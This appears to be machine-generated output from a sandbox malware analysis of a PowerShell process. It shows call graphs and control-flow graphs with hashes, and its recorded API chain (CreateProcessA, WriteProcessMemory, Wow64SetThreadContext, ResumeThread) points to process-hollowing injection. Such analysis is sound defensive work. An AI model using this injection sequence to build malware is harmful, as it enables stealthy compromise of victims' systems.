15131 299c70 WriteProcessMemory 15128->15131 15129 4361a7d 15129->14998 15130->15129 15131->15129 15211 4360006 15132->15211 15215 4360040 15132->15215 15133 436086a 15137 299c69 WriteProcessMemory 15133->15137 15138 299c70 WriteProcessMemory 15133->15138 15134 4361a7d 15134->14998 15137->15134 15138->15134 15140 436086a 15139->15140 15142 299c69 WriteProcessMemory 15140->15142 15143 299c70 WriteProcessMemory 15140->15143 15141 4361a7d 15141->14998 15142->15141 15143->15141 15145 436086a 15144->15145 15147 299c69 WriteProcessMemory 15145->15147 15148 299c70 WriteProcessMemory 15145->15148 15146 4361a7d 15146->14998 15147->15146 15148->15146 15150 4360e90 15149->15150 15151 436086a 15150->15151 15155 4362370 2 API calls 15150->15155 15156 4362360 2 API calls 15150->15156 15153 299c69 WriteProcessMemory 15151->15153 15154 299c70 WriteProcessMemory 15151->15154 15152 4361a7d 15152->14998 15153->15152 15154->15152 15155->15151 15156->15151 15158 436086a 15157->15158 15160 299c69 WriteProcessMemory 15158->15160 15161 299c70 WriteProcessMemory 15158->15161 15159 4361a7d 15159->14998 15160->15159 15161->15159 15163 436086a 15162->15163 15165 299c69 WriteProcessMemory 15163->15165 15166 299c70 WriteProcessMemory 15163->15166 15164 4361a7d 15164->14998 15165->15164 15166->15164 15168 299c70 WriteProcessMemory 15167->15168 15170 299d5b 15168->15170 15170->15028 15172 299cbc WriteProcessMemory 15171->15172 15174 299d5b 15172->15174 15174->15028 15176 4362385 15175->15176 15185 299928 15176->15185 15189 299920 15176->15189 15177 4362398 15177->15048 15181 4362385 15180->15181 15183 299928 ResumeThread 15181->15183 15184 299920 ResumeThread 15181->15184 15182 4362398 15182->15048 15183->15182 15184->15182 15186 29996c ResumeThread 15185->15186 15188 2999be 15186->15188 15188->15177 15190 299925 ResumeThread 15189->15190 15192 2999be 15190->15192 15192->15177 15194 436233d 15193->15194 15203 299a18 15194->15203 15207 299a10 15194->15207 15195 4362353 15195->15065 15199 4362326 15198->15199 15201 299a18 Wow64SetThreadContext 15199->15201 15202 299a10 Wow64SetThreadContext 15199->15202 15200 4362353 15200->15065 15201->15200 15202->15200 15204 299a61 Wow64SetThreadContext 15203->15204 15206 299adf 15204->15206 15206->15195 15208 299a18 Wow64SetThreadContext 15207->15208 15210 299adf 15208->15210 15210->15195 15212 4360036 CreateProcessA 15211->15212 15214 436032d 15212->15214 15216 43600c7 CreateProcessA 15215->15216 15218 436032d 15216->15218 15219 296650 15221 296666 15219->15221 15220 2966c1 15221->15220 15223 2991c1 15221->15223 15224 299189 15223->15224 15225 2991ce 15223->15225 15228 29a5c9 15225->15228 15229 29a4fd 15228->15229 15229->15228 15230 2991f7 15229->15230 15257 29ba6e 15229->15257 15264 29b9ac 15229->15264 15269 29ae16 15229->15269 15274 29b256 15229->15274 15282 29b515 15229->15282 15287 29b593 15229->15287 15292 29b5df 15229->15292 15297 29b1dd 15229->15297 15302 29ae82 15229->15302 15310 29aec3 15229->15310 15315 29b301 15229->15315 15320 29b40e 15229->15320 15325 29b18c 15229->15325 15330 29ac4d 15229->15330 15335 29b3cd 15229->15335 15340 29ad4a 15229->15340 15345 29b88b 15229->15345 15350 29acf7 15229->15350 15355 29b734 15229->15355 15363 29b4b5 15229->15363 15367 29ae32 15229->15367 15375 29af71 15229->15375 15380 29a83c 15229->15380 15385 29b63c 15229->15385 15390 29b47c 15229->15390 15395 29aba2 15229->15395 15230->15221 15399 29a008 15257->15399 15403 299ffd 15257->15403 15258 29a832 15260 299c69 WriteProcessMemory 15258->15260 15261 299c70 WriteProcessMemory 15258->15261 15259 29ba45 15259->15229 15260->15259 15261->15259 15265 29a832 15264->15265 15267 299c69 WriteProcessMemory 15265->15267 15268 299c70 WriteProcessMemory 15265->15268 15266 29ba45 15266->15229 15267->15266 15268->15266 15270 29a832 15269->15270 15272 299c69 WriteProcessMemory 15270->15272 15273 299c70 WriteProcessMemory 15270->15273 15271 29ba45 15271->15229 15272->15271 15273->15271 15275 29b260 15274->15275 15407 29c328 15275->15407 15412 29c338 15275->15412 15276 29a832 15280 299c69 WriteProcessMemory 15276->15280 15281 299c70 WriteProcessMemory 15276->15281 15277 29ba45 15277->15229 15280->15277 15281->15277 15283 29a832 15282->15283 15285 299c69 WriteProcessMemory 15283->15285 15286 299c70 WriteProcessMemory 15283->15286 15284 29ba45 15284->15229 15285->15284 15286->15284 15288 29a832 15287->15288 15290 299c69 WriteProcessMemory 15288->15290 15291 299c70 WriteProcessMemory 15288->15291 15289 29ba45 15289->15229 15290->15289 15291->15289 15293 29a832 15292->15293 15295 299c69 WriteProcessMemory 15293->15295 15296 299c70 WriteProcessMemory 15293->15296 15294 29ba45 15294->15229 15295->15294 15296->15294 15298 29a832 15297->15298 15300 299c69 WriteProcessMemory 15298->15300 15301 299c70 WriteProcessMemory 15298->15301 15299 29ba45 15299->15229 15300->15299 15301->15299 15303 29ae58 15302->15303 15304 29a832 15303->15304 15308 29c328 2 API calls 15303->15308 15309 29c338 2 API calls 15303->15309 15306 299c69 WriteProcessMemory 15304->15306 15307 299c70 WriteProcessMemory 15304->15307 15305 29ba45 15305->15229 15306->15305 15307->15305 15308->15304 15309->15304 15311 29a832 15310->15311 15313 299c69 WriteProcessMemory 15311->15313 15314 299c70 WriteProcessMemory 15311->15314 15312 29ba45 15312->15229 15313->15312 15314->15312 15316 29a832 15315->15316 15318 299c69 WriteProcessMemory 15316->15318 15319 299c70 WriteProcessMemory 15316->15319 15317 29ba45 15317->15229 15318->15317 15319->15317 15321 29a832 15320->15321 15323 299c69 WriteProcessMemory 15321->15323 15324 299c70 WriteProcessMemory 15321->15324 15322 29ba45 15322->15229 15323->15322 15324->15322 15326 29a832 15325->15326 15326->15325 15328 299c69 WriteProcessMemory 15326->15328 15329 299c70 WriteProcessMemory 15326->15329 15327 29ba45 15327->15229 15328->15327 15329->15327 15331 29a832 15330->15331 15331->15330 15333 299c69 WriteProcessMemory 15331->15333 15334 299c70 WriteProcessMemory 15331->15334 15332 29ba45 15332->15229 15333->15332 15334->15332 15417 29c2df 15335->15417 15422 29c2f0 15335->15422 15427 29c2a1 15335->15427 15336 29b3e5 15341 29a832 15340->15341 15343 299c69 WriteProcessMemory 15341->15343 15344 299c70 WriteProcessMemory 15341->15344 15342 29ba45 15342->15229 15343->15342 15344->15342 15346 29a832 15345->15346 15348 299c69 WriteProcessMemory 15346->15348 15349 299c70 WriteProcessMemory 15346->15349 15347 29ba45 15347->15229 15348->15347 15349->15347 15351 29ba1e 15350->15351 15353 299c69 WriteProcessMemory 15351->15353 15354 299c70 WriteProcessMemory 15351->15354 15352 29ba45 15352->15229 15353->15352 15354->15352 15356 29b27c 15355->15356 15357 29a832 15355->15357 15359 29c328 2 API calls 15356->15359 15360 29c338 2 API calls 15356->15360 15361 299c69 WriteProcessMemory 15357->15361 15362 299c70 WriteProcessMemory 15357->15362 15358 29ba45 15358->15229 15359->15357 15360->15357 15361->15358 15362->15358 15365 299c69 WriteProcessMemory 15363->15365 15366 299c70 WriteProcessMemory 15363->15366 15364 29b4df 15365->15364 15366->15364 15368 29ae3c 15367->15368 15373 29c328 2 API calls 15368->15373 15374 29c338 2 API calls 15368->15374 15369 29a832 15371 299c69 WriteProcessMemory 15369->15371 15372 299c70 WriteProcessMemory 15369->15372 15370 29ba45 15370->15229 15371->15370 15372->15370 15373->15369 15374->15369 15376 29a832 15375->15376 15378 299c69 WriteProcessMemory 15376->15378 15379 299c70 WriteProcessMemory 15376->15379 15377 29ba45 15377->15229 15378->15377 15379->15377 15381 29a832 15380->15381 15383 299c69 WriteProcessMemory 15381->15383 15384 299c70 WriteProcessMemory 15381->15384 15382 29ba45 15382->15229 15383->15382 15384->15382 15386 29a832 15385->15386 15388 299c69 WriteProcessMemory 15386->15388 15389 299c70 WriteProcessMemory 15386->15389 15387 29ba45 15387->15229 15388->15387 15389->15387 15391 29a832 15390->15391 15393 299c69 WriteProcessMemory 15391->15393 15394 299c70 WriteProcessMemory 15391->15394 15392 29ba45 15392->15229 15393->15392 15394->15392 15397 299c69 WriteProcessMemory 15395->15397 15398 299c70 WriteProcessMemory 15395->15398 15396 29abd6 15397->15396 15398->15396 15400 29a08f CreateProcessA 15399->15400 15402 29a2f5 15400->15402 15402->15258 15404 29a008 CreateProcessA 15403->15404 15406 29a2f5 15404->15406 15406->15258 15408 29c338 15407->15408 15410 299928 ResumeThread 15408->15410 15411 299920 ResumeThread 15408->15411 15409 29c360 15409->15276 15410->15409 15411->15409 15413 29c34d 15412->15413 15415 299928 ResumeThread 15413->15415 15416 299920 ResumeThread 15413->15416 15414 29c360 15414->15276 15415->15414 15416->15414 15418 29c2f1 15417->15418 15420 299a18 Wow64SetThreadContext 15418->15420 15421 299a10 Wow64SetThreadContext 15418->15421 15419 29c31b 15419->15336 15420->15419 15421->15419 15423 29c2f1 15422->15423 15425 299a18 Wow64SetThreadContext 15423->15425 15426 299a10 Wow64SetThreadContext 15423->15426 15424 29c31b 15424->15336 15425->15424 15426->15424 15428 29c2f1 15427->15428 15429 29c2aa 15427->15429 15431 299a18 Wow64SetThreadContext 15428->15431 15432 299a10 Wow64SetThreadContext 15428->15432 15429->15336 15430 29c31b 15430->15336 15431->15430 15432->15430

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4c1648-4c165a 1 4c171a-4c1720 0->1 2 4c1660-4c1671 0->2 5 4c16cf 1->5 6 4c1722-4c1794 1->6 7 4c168b-4c16a8 2->7 8 4c1673-4c1679 2->8 5->6 11 4c16d2-4c16d4 5->11 28 4c1796-4c17a4 6->28 29 4c17c1-4c17c6 6->29 7->1 17 4c16aa-4c16cc 7->17 9 4c167d-4c1689 8->9 10 4c167b 8->10 9->7 10->7 13 4c16d8-4c16e4 11->13 14 4c16d6 11->14 18 4c16e6-4c16fe 13->18 14->18 17->18 26 4c16ce 17->26 24 4c170c-4c1717 18->24 25 4c1700-4c1702 18->25 25->24 26->5 32 4c17ac-4c17bb 28->32 29->28 32->29
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 891$\91$\91
                    • API String ID: 0-1733504215
                    • Opcode ID: d90f7e53cbdb06fc6015c6e08090af45d1bbac61c2bec0b64ef41c7e3621ebb7
                    • Instruction ID: 1c93ca57d3547c4a235b4a37ee993353aa882c493b726ddaac25f8921877ac46
                    • Opcode Fuzzy Hash: d90f7e53cbdb06fc6015c6e08090af45d1bbac61c2bec0b64ef41c7e3621ebb7
                    • Instruction Fuzzy Hash: 1C412734B053549FCB649B648814B7E7BA1DF86710F24816FE944EF392CA71DC4187A6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 69 4c0ad0-4c0af3 70 4c0cce-4c0cd4 69->70 71 4c0af9-4c0afe 69->71 81 4c0cd6-4c0cfa 70->81 82 4c0c83-4c0c85 70->82 72 4c0b16-4c0b1a 71->72 73 4c0b00-4c0b06 71->73 74 4c0c7b-4c0c7f 72->74 75 4c0b20-4c0b24 72->75 77 4c0b08 73->77 78 4c0b0a-4c0b14 73->78 74->82 79 4c0b26-4c0b35 75->79 80 4c0b37 75->80 77->72 78->72 83 4c0b39-4c0b3b 79->83 80->83 84 4c0cfc-4c0d01 81->84 85 4c0d47-4c0d81 81->85 86 4c0c87-4c0c90 82->86 87 4c0c93-4c0c99 82->87 83->74 91 4c0b41-4c0b61 83->91 92 4c0d19-4c0d31 84->92 93 4c0d03-4c0d09 84->93 101 4c0da0 85->101 102 4c0d83-4c0d9e 85->102 89 4c0c9f-4c0cab 87->89 90 4c0c9b-4c0c9d 87->90 96 4c0cad-4c0ccb 89->96 90->96 116 4c0b80 91->116 117 4c0b63-4c0b7e 91->117 106 4c0d3f-4c0d44 92->106 107 4c0d33-4c0d35 92->107 94 4c0d0d-4c0d17 93->94 95 4c0d0b 93->95 94->92 95->92 104 4c0da2-4c0da4 101->104 102->104 108 4c0daa-4c0dae 104->108 109 4c0e32-4c0e3c 104->109 107->106 108->109 112 4c0db4-4c0dd1 108->112 113 4c0e3e-4c0e45 109->113 114 4c0e48-4c0e4e 109->114 128 4c0dd7-4c0dd9 112->128 129 4c0e81-4c0e86 112->129 120 4c0e54-4c0e60 114->120 121 4c0e50-4c0e52 114->121 118 4c0b82-4c0b84 116->118 117->118 118->74 122 4c0b8a-4c0b8c 118->122 124 4c0e62-4c0e7e 120->124 121->124 126 4c0b9c 122->126 127 4c0b8e-4c0b9a 122->127 131 4c0b9e-4c0ba0 126->131 127->131 132 4c0ddb-4c0de1 128->132 133 4c0df3-4c0e08 128->133 129->128 131->74 137 4c0ba6-4c0bc6 131->137 138 4c0de5-4c0df1 132->138 139 4c0de3 132->139 142 4c0e0e-4c0e2c 133->142 143 4c0e8b-4c0ebc 133->143 151 4c0bde-4c0be2 137->151 152 4c0bc8-4c0bce 137->152 138->133 139->133 142->109 149 4c0ecc 143->149 150 4c0ebe-4c0eca 143->150 153 4c0ece-4c0ed0 149->153 150->153 156 4c0bfc-4c0c00 151->156 157 4c0be4-4c0bea 151->157 154 4c0bd0 152->154 155 4c0bd2-4c0bd4 152->155 160 4c0ef2-4c0efc 153->160 161 4c0ed2-4c0ed6 153->161 154->151 155->151 162 4c0c07-4c0c09 156->162 158 4c0bec 157->158 159 4c0bee-4c0bfa 157->159 158->156 159->156 164 4c0efe-4c0f03 160->164 165 4c0f06-4c0f0c 160->165 161->160 163 4c0ed8-4c0eef 161->163 169 4c0c0b-4c0c11 162->169 170 4c0c21-4c0c78 162->170 166 4c0f0e-4c0f10 165->166 167 4c0f12-4c0f1e 165->167 171 4c0f20-4c0f3a 166->171 167->171 172 4c0c15-4c0c17 169->172 173 4c0c13 169->173 172->170 173->170
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: T;1$T;1
                    • API String ID: 0-2441291141
                    • Opcode ID: 0c5c1987d4c3e6ea082401979f9ca6cf1f37effbba17965b9df021cd649f4189
                    • Instruction ID: fbb5eaf2e865df820ef03b49df0e5aeb8c5500e03718bad36f0576ab52be4628
                    • Opcode Fuzzy Hash: 0c5c1987d4c3e6ea082401979f9ca6cf1f37effbba17965b9df021cd649f4189
                    • Instruction Fuzzy Hash: E3C12539708340CFDB659B788410B6ABBA2EFD2314F24846FD445DB392DA39DC42C766

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 179 4c0f60-4c0f6f 180 4c0f8f 179->180 181 4c0f71-4c0f8d 179->181 182 4c0f91-4c0f93 180->182 181->182 184 4c0f99-4c0fa0 182->184 185 4c1040-4c104a 182->185 186 4c1098-4c10e3 184->186 187 4c0fa6-4c0fab 184->187 188 4c104c-4c1053 185->188 189 4c1056-4c105c 185->189 200 4c10e9-4c10ee 186->200 201 4c123a-4c1240 186->201 191 4c0fad-4c0fb3 187->191 192 4c0fc3-4c0fd9 187->192 193 4c105e-4c1060 189->193 194 4c1062-4c106e 189->194 195 4c0fb5 191->195 196 4c0fb7-4c0fc1 191->196 192->186 207 4c0fdf-4c0fff 192->207 198 4c1070-4c108b 193->198 194->198 195->192 196->192 205 4c1106-4c110a 200->205 206 4c10f0-4c10f6 200->206 217 4c11ef-4c11f1 201->217 218 4c1242-4c126d 201->218 208 4c11e7-4c11eb 205->208 209 4c1110-4c1112 205->209 211 4c10f8 206->211 212 4c10fa-4c1104 206->212 220 4c108e-4c1093 207->220 221 4c1005-4c100c 207->221 208->217 214 4c1114-4c1120 209->214 215 4c1122 209->215 211->205 212->205 222 4c1124-4c1126 214->222 215->222 225 4c11ff-4c1205 217->225 226 4c11f3-4c11fc 217->226 223 4c127d 218->223 224 4c126f-4c127b 218->224 220->221 227 4c100e-4c1014 221->227 228 4c1026-4c103a 221->228 222->208 229 4c112c-4c1130 222->229 230 4c127f-4c1281 223->230 224->230 231 4c120b-4c1217 225->231 232 4c1207-4c1209 225->232 233 4c1018-4c1024 227->233 234 4c1016 227->234 228->185 236 4c1150 229->236 237 4c1132-4c114e 229->237 238 4c12cd-4c12d7 230->238 239 4c1283-4c1289 230->239 240 4c1219-4c1237 231->240 232->240 233->228 234->228 244 4c1152-4c1154 236->244 237->244 242 4c12d9-4c12df 238->242 243 4c12e2-4c12e8 238->243 245 4c128b-4c128d 239->245 246 4c1297-4c12b4 239->246 249 4c12ee-4c12fa 243->249 250 4c12ea-4c12ec 243->250 244->208 252 4c115a-4c116d 244->252 245->246 256 4c131a-4c131f 246->256 257 4c12b6-4c12c7 246->257 254 4c12fc-4c1317 249->254 250->254 262 4c1173-4c1175 252->262 256->257 257->238 264 4c118d-4c11e4 262->264 265 4c1177-4c117d 262->265 267 4c117f 265->267 268 4c1181-4c1183 265->268 267->264 268->264
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: H\)$;1
                    • API String ID: 0-145614036
                    • Opcode ID: 0ca2d60b883c81a7f3a727de6394edbefea86faa4f9148a83234ae4a45904da5
                    • Instruction ID: e447b91960876c012bab6ddcef117d4774cfb5675938d456234b0561c09cc093
                    • Opcode Fuzzy Hash: 0ca2d60b883c81a7f3a727de6394edbefea86faa4f9148a83234ae4a45904da5
                    • Instruction Fuzzy Hash: C3A105397043109FEB648A69C850F7BBBA1EF86311F24806FD545DB3A2DA79CC81C796

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 270 4c5450-4c5455 271 4c5488 270->271 272 4c5457-4c547d 270->272 273 4c548a-4c5490 271->273 274 4c54a0-4c54a4 271->274 275 4c55d7-4c55ec 272->275 276 4c5483-4c5486 272->276 277 4c5494-4c549e 273->277 278 4c5492 273->278 279 4c54aa-4c54ac 274->279 280 4c5587-4c5591 274->280 286 4c55ee-4c55f7 275->286 287 4c5643-4c5649 275->287 276->271 277->274 278->274 283 4c54ae-4c54bf 279->283 284 4c54ef 279->284 281 4c559f-4c55a5 280->281 282 4c5593-4c559c 280->282 289 4c55ab-4c55b7 281->289 290 4c55a7-4c55a9 281->290 283->275 299 4c54c5-4c54cd 283->299 288 4c54f1-4c54f3 284->288 286->287 296 4c564f-4c5651 287->296 297 4c56eb-4c56f5 287->297 288->280 293 4c54f9-4c551d 288->293 294 4c55b9-4c55d4 289->294 290->294 320 4c551f-4c5525 293->320 321 4c5537-4c553e 293->321 302 4c5661 296->302 303 4c5653-4c565f 296->303 300 4c56f7-4c56ff 297->300 301 4c5702-4c5708 297->301 306 4c54cf-4c54d5 299->306 307 4c54e5-4c54ed 299->307 308 4c570e-4c571a 301->308 309 4c570a-4c570c 301->309 310 4c5663-4c5665 302->310 303->310 311 4c54d9-4c54e3 306->311 312 4c54d7 306->312 307->288 313 4c571c-4c5736 308->313 309->313 310->297 314 4c566b-4c5671 310->314 311->307 312->307 318 4c567f-4c56e8 314->318 319 4c5673-4c5675 314->319 319->318 324 4c5529-4c5535 320->324 325 4c5527 320->325 327 4c5544-4c5584 321->327 324->321 325->321
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: X1$|1
                    • API String ID: 0-1537067983
                    • Opcode ID: 9c6c045af2523bf935ce97d7abfbe90b3a4980c393abac74111f8a4a0420a892
                    • Instruction ID: 1513c7ceb7358e3cdb9da9650eb3a5d2ae301c625f35b103d7713857e68566a8
                    • Opcode Fuzzy Hash: 9c6c045af2523bf935ce97d7abfbe90b3a4980c393abac74111f8a4a0420a892
                    • Instruction Fuzzy Hash: 2B612439B00600CFCB548B689410BAFBBB2AFD5311B2484BFC509CB356DA35EC86C796

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 333 4c1738-4c1794 338 4c1796-4c17a4 333->338 339 4c17c1-4c17c6 333->339 342 4c17ac-4c17bb 338->342 339->338 342->339
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: \91$\91
                    • API String ID: 0-3548510675
                    • Opcode ID: ab992c176432eb24efb94050b683da2edcd787b440f00ae6bd803fb6c5d86977
                    • Instruction ID: af1d22d9c4b6781e7746f058dd4256b81679c813abb13c9510269bfc410cdf22
                    • Opcode Fuzzy Hash: ab992c176432eb24efb94050b683da2edcd787b440f00ae6bd803fb6c5d86977
                    • Instruction Fuzzy Hash: EF01F9347803446FDB6467754825FBF26959F99B04F10412AF8069F3C1C9B1EC824766
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: _
                    • API String ID: 0-701932520
                    • Opcode ID: cb70dc3ecf7de1d20a4b14429c804a53dd4690599fc117ff6ef410c3cd2d1951
                    • Instruction ID: 88018f2b28e895ee13f660da867142ba65bb9ca639cb109fa53852511de5e22f
                    • Opcode Fuzzy Hash: cb70dc3ecf7de1d20a4b14429c804a53dd4690599fc117ff6ef410c3cd2d1951
                    • Instruction Fuzzy Hash: 4552F038B042059FDBA49F28C540BABB7A2EB95311F24C4BFD4158B351DBB9CD41CBA6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 665 4360006-4360034 666 4360036-43600aa 665->666 667 43600b3-43600d9 665->667 666->667 670 4360122-436014a 667->670 671 43600db-43600f2 667->671 675 4360190-43601e6 670->675 676 436014c-4360160 670->676 671->670 674 43600f4-43600f9 671->674 677 436011c-436011f 674->677 678 43600fb-4360105 674->678 684 436022c-436032b CreateProcessA 675->684 685 43601e8-43601fc 675->685 676->675 686 4360162-4360167 676->686 677->670 679 4360107 678->679 680 4360109-4360118 678->680 679->680 680->680 683 436011a 680->683 683->677 704 4360334-436041d 684->704 705 436032d-4360333 684->705 685->684 694 43601fe-4360203 685->694 687 436018a-436018d 686->687 688 4360169-4360173 686->688 687->675 689 4360177-4360186 688->689 690 4360175 688->690 689->689 693 4360188 689->693 690->689 693->687 696 4360226-4360229 694->696 697 4360205-436020f 694->697 696->684 698 4360213-4360222 697->698 699 4360211 697->699 698->698 701 4360224 698->701 699->698 701->696 716 436041f-4360423 704->716 717 436042d-4360431 704->717 705->704 716->717 718 4360425 716->718 719 4360433-4360437 717->719 720 4360441-4360445 717->720 718->717 719->720 721 4360439 719->721 722 4360447-436044b 720->722 723 4360455-4360459 720->723 721->720 722->723 724 436044d 722->724 725 436048f-436049a 723->725 726 436045b-4360484 723->726 724->723 729 436049b 725->729 726->725 729->729
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0436030F
                    Memory Dump Source
                    • Source File: 00000006.00000002.482376211.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4360000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 8fa9f451bc635c031e12d4c8fe02a7e797b4338984138cedc6961de4faeb42de
                    • Instruction ID: a34146feb40f3069369064ee9204a3e7f9ee8e0709bb913d6cc72e01193a8bc2
                    • Opcode Fuzzy Hash: 8fa9f451bc635c031e12d4c8fe02a7e797b4338984138cedc6961de4faeb42de
                    • Instruction Fuzzy Hash: F8D158B4D0021A8FDF25CFA4C8417EEBBB1BF09304F14A5A9D859B7254DB74AA85CF81

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 731 299ffd-29a0a1 734 29a0ea-29a112 731->734 735 29a0a3-29a0ba 731->735 738 29a158-29a1ae 734->738 739 29a114-29a128 734->739 735->734 740 29a0bc-29a0c1 735->740 749 29a1b0-29a1c4 738->749 750 29a1f4-29a2f3 CreateProcessA 738->750 739->738 747 29a12a-29a12f 739->747 741 29a0c3-29a0cd 740->741 742 29a0e4-29a0e7 740->742 744 29a0cf 741->744 745 29a0d1-29a0e0 741->745 742->734 744->745 745->745 748 29a0e2 745->748 751 29a131-29a13b 747->751 752 29a152-29a155 747->752 748->742 749->750 757 29a1c6-29a1cb 749->757 768 29a2fc-29a3e5 750->768 769 29a2f5-29a2fb 750->769 753 29a13d 751->753 754 29a13f-29a14e 751->754 752->738 753->754 754->754 758 29a150 754->758 759 29a1cd-29a1d7 757->759 760 29a1ee-29a1f1 757->760 758->752 762 29a1d9 759->762 763 29a1db-29a1ea 759->763 760->750 762->763 763->763 764 29a1ec 763->764 764->760 780 29a3f5-29a3f9 768->780 781 29a3e7-29a3eb 768->781 769->768 783 29a409-29a40d 780->783 784 29a3fb-29a3ff 780->784 781->780 782 29a3ed 781->782 782->780 786 29a41d-29a421 783->786 787 29a40f-29a413 783->787 784->783 785 29a401 784->785 785->783 788 29a423-29a44c 786->788 789 29a457-29a485 786->789 787->786 790 29a415 787->790 788->789 796 29a48c-29a493 789->796 797 29a487 789->797 790->786 797->796
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0029A2D7
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: cbff8a12330b2547b58e183965a39cb6436c9c6f24262b6c380d44f077d47f81
                    • Instruction ID: 7db3d0195db6227630b88fd8f60295d68acff74cf091fb290175defcd5b7dafe
                    • Opcode Fuzzy Hash: cbff8a12330b2547b58e183965a39cb6436c9c6f24262b6c380d44f077d47f81
                    • Instruction Fuzzy Hash: 36C124B0D102298FDF24CFA4C845BEEBBB1BF49300F1091A9E819B7250DB749A95DF85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 798 29a008-29a0a1 800 29a0ea-29a112 798->800 801 29a0a3-29a0ba 798->801 804 29a158-29a1ae 800->804 805 29a114-29a128 800->805 801->800 806 29a0bc-29a0c1 801->806 815 29a1b0-29a1c4 804->815 816 29a1f4-29a2f3 CreateProcessA 804->816 805->804 813 29a12a-29a12f 805->813 807 29a0c3-29a0cd 806->807 808 29a0e4-29a0e7 806->808 810 29a0cf 807->810 811 29a0d1-29a0e0 807->811 808->800 810->811 811->811 814 29a0e2 811->814 817 29a131-29a13b 813->817 818 29a152-29a155 813->818 814->808 815->816 823 29a1c6-29a1cb 815->823 834 29a2fc-29a3e5 816->834 835 29a2f5-29a2fb 816->835 819 29a13d 817->819 820 29a13f-29a14e 817->820 818->804 819->820 820->820 824 29a150 820->824 825 29a1cd-29a1d7 823->825 826 29a1ee-29a1f1 823->826 824->818 828 29a1d9 825->828 829 29a1db-29a1ea 825->829 826->816 828->829 829->829 830 29a1ec 829->830 830->826 846 29a3f5-29a3f9 834->846 847 29a3e7-29a3eb 834->847 835->834 849 29a409-29a40d 846->849 850 29a3fb-29a3ff 846->850 847->846 848 29a3ed 847->848 848->846 852 29a41d-29a421 849->852 853 29a40f-29a413 849->853 850->849 851 29a401 850->851 851->849 854 29a423-29a44c 852->854 855 29a457-29a485 852->855 853->852 856 29a415 853->856 854->855 862 29a48c-29a493 855->862 863 29a487 855->863 856->852 863->862
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0029A2D7
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 241bbac14d527ebe54782a714d82ed0142700d07b727058f3e8ba143f0afec32
                    • Instruction ID: 0d733c1788fb5e2f4d6767f0ceca8fcc0d6679c59e8635c39c98968f4f32f33d
                    • Opcode Fuzzy Hash: 241bbac14d527ebe54782a714d82ed0142700d07b727058f3e8ba143f0afec32
                    • Instruction Fuzzy Hash: 09C115B1D102298FDF24CFA4C845BEEBBB1BF49300F1091A9E819B7250DB749A95DF85

                    Control-flow Graph

                    • Executed
                    • Not Executed
